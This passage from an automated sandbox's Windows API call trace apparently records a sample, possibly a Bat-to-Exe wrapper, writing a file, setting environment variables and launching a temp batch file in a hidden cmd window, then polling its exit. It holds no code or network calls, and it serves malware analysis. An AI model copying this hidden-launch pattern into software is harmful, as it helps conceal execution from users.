hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.221] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a683d0 | out: hHeap=0x2a60000) returned 1 [0078.221] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0078.221] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0078.221] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0078.221] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0078.221] WriteFile (in: hFile=0x7c, lpBuffer=0x2f50048*, nNumberOfBytesToWrite=0x2f600, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x2f50048*, lpNumberOfBytesWritten=0x19fe60*=0x2f600, lpOverlapped=0x0) returned 1 [0078.225] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0078.226] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0078.226] CloseHandle (hObject=0x7c) returned 1 [0078.231] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.231] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x2a60000) returned 1 [0078.231] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2f50048 | out: hHeap=0x10e0000) returned 1 [0078.232] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.232] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a687f0 [0078.232] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0078.232] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0078.232] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0078.232] CloseHandle (hObject=0x7c) returned 1 [0078.232] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.232] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a687f0 | out: hHeap=0x2a60000) returned 1 [0078.232] GetLastError () returned 0x0 [0078.233] SetLastError (dwErrCode=0x0) [0078.233] GetLastError () returned 0x0 [0078.233] SetLastError (dwErrCode=0x0) [0078.233] GetLastError () returned 0x0 [0078.233] SetLastError (dwErrCode=0x0) [0078.233] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.233] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a683d0 [0078.233] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x29a0d20 [0078.233] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", lpszShortPath=0x29a0d20, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.234] GetLastError () returned 0x0 [0078.234] SetLastError (dwErrCode=0x0) [0078.234] GetLastError () returned 0x0 [0078.234] SetLastError (dwErrCode=0x0) [0078.234] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68168 [0078.234] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x29a0d20 | out: hHeap=0x10e0000) returned 1 [0078.234] GetLastError () returned 0x0 [0078.234] SetLastError (dwErrCode=0x0) [0078.234] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.234] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a683d0 | out: hHeap=0x2a60000) returned 1 [0078.234] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68168 | out: hHeap=0x2a60000) returned 1 [0078.234] GetLastError () returned 0x0 [0078.234] SetLastError (dwErrCode=0x0) [0078.234] wcslen (_String="b2eincfile") returned 0xa [0078.234] GetLastError () returned 0x0 [0078.234] SetLastError (dwErrCode=0x0) [0078.234] GetLastError () returned 0x0 [0078.234] SetLastError (dwErrCode=0x0) [0078.234] SetEnvironmentVariableW (lpName="b2eincfile9", lpValue="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 1 [0078.235] GetLastError () returned 0x0 [0078.235] SetLastError (dwErrCode=0x0) [0078.235] GetLastError () returned 0x0 [0078.235] SetLastError (dwErrCode=0x0) [0078.235] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.235] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a683d0 [0078.235] GetLastError () returned 0x0 [0078.235] SetLastError (dwErrCode=0x0) [0078.235] GetLastError () returned 0x0 [0078.235] SetLastError (dwErrCode=0x0) [0078.235] GetLastError () returned 0x0 [0078.235] SetLastError (dwErrCode=0x0) [0078.235] GetLastError () returned 0x0 [0078.235] SetLastError (dwErrCode=0x0) [0078.235] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0078.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0078.235] malloc (_Size=0x2) returned 0x1121150 [0078.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x1121150, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0078.235] free (_Block=0x1121150) [0078.235] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.236] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a0f0, Size=0x5a) returned 0x2a6a290 [0078.236] GetLastError () returned 0x0 [0078.236] SetLastError (dwErrCode=0x0) [0078.236] GetLastError () returned 0x0 [0078.236] SetLastError (dwErrCode=0x0) [0078.236] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a430, Size=0x5a) returned 0x2a6a6a0 [0078.236] FindResourceW (hModule=0x400000, lpName="DA39A3EE5E6B4B0D3255BFEF95601890AFD80709", lpType=0xa) returned 0x0 [0078.236] FindResourceW (hModule=0x400000, lpName="90708DFA09810659FEFB5523D0B4B6E5EE3A93AD", lpType=0xa) returned 0x0 [0078.236] GetLastError () returned 0x716 [0078.236] SetLastError (dwErrCode=0x716) [0078.236] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0078.236] wcslen (_String="\\") returned 0x1 [0078.236] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0x3a) returned 0x2a6abc8 [0078.236] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0078.236] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a68c00 [0078.236] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0078.236] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a68d68 [0078.236] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.236] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.237] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.237] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68d68 | out: hHeap=0x2a60000) returned 1 [0078.237] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x5, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.237] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.237] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68c00 | out: hHeap=0x2a60000) returned 1 [0078.237] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0078.237] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a68ed0 [0078.237] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.237] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.238] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68ed0 | out: hHeap=0x2a60000) returned 1 [0078.238] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x29932d8 | out: hHeap=0x10e0000) returned 1 [0078.238] GetLastError () returned 0x3 [0078.238] SetLastError (dwErrCode=0x3) [0078.238] GetLastError () returned 0x3 [0078.238] SetLastError (dwErrCode=0x3) [0078.238] GetLastError () returned 0x3 [0078.238] SetLastError (dwErrCode=0x3) [0078.239] SetEnvironmentVariableW (lpName="b2eincfilecount", lpValue="9") returned 1 [0078.239] GetLastError () returned 0x0 [0078.239] SetLastError (dwErrCode=0x0) [0078.239] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a290 | out: hHeap=0x2a60000) returned 1 [0078.239] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a6a0 | out: hHeap=0x2a60000) returned 1 [0078.239] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6abc8 | out: hHeap=0x2a60000) returned 1 [0078.239] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68848 | out: hHeap=0x2a60000) returned 1 [0078.239] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68798 | out: hHeap=0x2a60000) returned 1 [0078.239] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a681c0 | out: hHeap=0x2a60000) returned 1 [0078.239] GetLastError () returned 0x0 [0078.239] SetLastError (dwErrCode=0x0) [0078.239] GetLastError () returned 0x0 [0078.239] SetLastError (dwErrCode=0x0) [0078.239] wcslen (_String="/c") returned 0x2 [0078.239] wcslen (_String=" ") returned 0x1 [0078.239] wcslen (_String="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"") returned 0x6c [0078.239] GetLastError () returned 0x0 [0078.239] SetLastError (dwErrCode=0x0) [0078.239] GetLastError () returned 0x0 [0078.239] SetLastError (dwErrCode=0x0) [0078.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a606e8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0078.240] GetLastError () returned 0x0 [0078.240] SetLastError (dwErrCode=0x0) [0078.240] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0078.240] wcslen (_String="cmd") returned 0x3 [0078.240] wcslen (_String="C:\\WINDOWS\\sysnative\\cmd") returned 0x18 [0078.240] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a69110 [0078.240] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0078.240] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a692c0 [0078.240] wcslen (_String="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"") returned 0x6f [0078.240] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xe8) returned 0x2a6b080 [0078.240] ShellExecuteExW (in: pExecInfo=0x19fee0*(cbSize=0x3c, fMask=0x140, hwnd=0x0, lpVerb="open", lpFile="C:\\WINDOWS\\sysnative\\cmd", lpParameters="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"", lpDirectory="C:\\Users\\FD1HVy\\Desktop\\", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19fee0*(cbSize=0x3c, fMask=0x140, hwnd=0x0, lpVerb="open", lpFile="C:\\WINDOWS\\sysnative\\cmd", lpParameters="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"", lpDirectory="C:\\Users\\FD1HVy\\Desktop\\", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x410)) returned 1 [0093.813] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0094.045] Sleep (dwMilliseconds=0x19) [0094.245] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.245] Sleep (dwMilliseconds=0x19) [0094.296] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.296] Sleep (dwMilliseconds=0x19) [0094.552] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.552] Sleep (dwMilliseconds=0x19) [0094.615] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.615] Sleep (dwMilliseconds=0x19) [0094.652] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.653] Sleep (dwMilliseconds=0x19) [0094.705] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.705] Sleep (dwMilliseconds=0x19) [0094.774] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.774] Sleep (dwMilliseconds=0x19) [0094.921] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.921] Sleep (dwMilliseconds=0x19) [0094.966] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.967] Sleep (dwMilliseconds=0x19) [0095.054] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.054] Sleep (dwMilliseconds=0x19) [0095.148] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.148] Sleep (dwMilliseconds=0x19) [0095.208] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.208] Sleep (dwMilliseconds=0x19) [0095.272] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.273] Sleep (dwMilliseconds=0x19) [0095.357] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.358] Sleep (dwMilliseconds=0x19) [0095.439] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.439] Sleep (dwMilliseconds=0x19) [0095.599] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.599] Sleep (dwMilliseconds=0x19) [0095.699] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.699] Sleep (dwMilliseconds=0x19) [0095.772] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.772] Sleep (dwMilliseconds=0x19) [0095.878] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0095.878] Sleep (dwMilliseconds=0x19) [0097.176] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.176] Sleep (dwMilliseconds=0x19) [0097.289] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.289] Sleep (dwMilliseconds=0x19) [0097.338] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.338] Sleep (dwMilliseconds=0x19) [0097.408] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.408] Sleep (dwMilliseconds=0x19) [0097.485] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.485] Sleep (dwMilliseconds=0x19) [0097.574] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.574] Sleep (dwMilliseconds=0x19) [0097.745] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.745] Sleep (dwMilliseconds=0x19) [0097.835] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.835] Sleep (dwMilliseconds=0x19) [0097.881] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.881] Sleep (dwMilliseconds=0x19) [0097.952] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.952] Sleep (dwMilliseconds=0x19) [0097.993] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.993] Sleep (dwMilliseconds=0x19) [0098.030] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.030] Sleep (dwMilliseconds=0x19) [0098.176] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.176] Sleep (dwMilliseconds=0x19) [0098.239] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.239] Sleep (dwMilliseconds=0x19) [0098.321] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.321] Sleep (dwMilliseconds=0x19) [0098.372] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.372] Sleep (dwMilliseconds=0x19) [0098.421] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.421] Sleep (dwMilliseconds=0x19) [0098.474] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.474] Sleep (dwMilliseconds=0x19) [0098.525] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.525] Sleep (dwMilliseconds=0x19) [0098.583] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.583] Sleep (dwMilliseconds=0x19) [0098.719] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.719] Sleep (dwMilliseconds=0x19) [0098.828] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.828] Sleep (dwMilliseconds=0x19) [0098.924] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.924] Sleep (dwMilliseconds=0x19) [0099.004] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.004] Sleep (dwMilliseconds=0x19) [0099.049] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.050] Sleep (dwMilliseconds=0x19) [0099.198] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.198] Sleep (dwMilliseconds=0x19) [0099.236] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.236] Sleep (dwMilliseconds=0x19) [0099.327] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.327] Sleep (dwMilliseconds=0x19) [0099.390] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.390] Sleep (dwMilliseconds=0x19) [0099.432] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.432] Sleep (dwMilliseconds=0x19) [0099.484] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.484] Sleep (dwMilliseconds=0x19) [0099.759] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.759] Sleep (dwMilliseconds=0x19) [0099.821] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.821] Sleep (dwMilliseconds=0x19) [0099.941] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.941] Sleep (dwMilliseconds=0x19) [0099.982] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.982] Sleep (dwMilliseconds=0x19) [0100.174] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.174] Sleep (dwMilliseconds=0x19) [0100.258] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.258] Sleep (dwMilliseconds=0x19) [0100.348] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.348] Sleep (dwMilliseconds=0x19) [0100.394] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.394] Sleep (dwMilliseconds=0x19) [0100.435] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.435] Sleep (dwMilliseconds=0x19) [0100.489] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.489] Sleep (dwMilliseconds=0x19) [0100.534] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.534] Sleep (dwMilliseconds=0x19) [0100.578] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.578] Sleep (dwMilliseconds=0x19) [0100.613] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.613] Sleep (dwMilliseconds=0x19) [0100.648] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.648] Sleep (dwMilliseconds=0x19) [0100.694] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.694] Sleep (dwMilliseconds=0x19) [0100.752] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.753] Sleep (dwMilliseconds=0x19) [0100.797] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.797] Sleep (dwMilliseconds=0x19) [0100.847] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.848] Sleep (dwMilliseconds=0x19) [0100.888] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.888] Sleep (dwMilliseconds=0x19) [0100.927] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.927] Sleep (dwMilliseconds=0x19) [0100.964] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.964] Sleep (dwMilliseconds=0x19) [0101.004] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.004] Sleep (dwMilliseconds=0x19) [0101.063] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: 